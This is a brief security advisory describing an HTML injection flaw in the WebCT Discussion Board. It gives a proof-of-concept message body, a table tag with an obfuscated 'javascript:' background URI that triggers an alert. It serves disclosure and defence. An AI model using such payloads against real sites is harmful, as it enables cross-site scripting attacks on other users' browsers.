WebCT Discussion Board HTML Injection Vulnerability

WebCT Discussion Board HTML Injection Vulnerability

No exploit is required.

The following proof of concept demonstrates a message field body suitable to exploit the vulnerability:

</pre><table background=java&#x09;script:alert("XSS Warning")>
</table>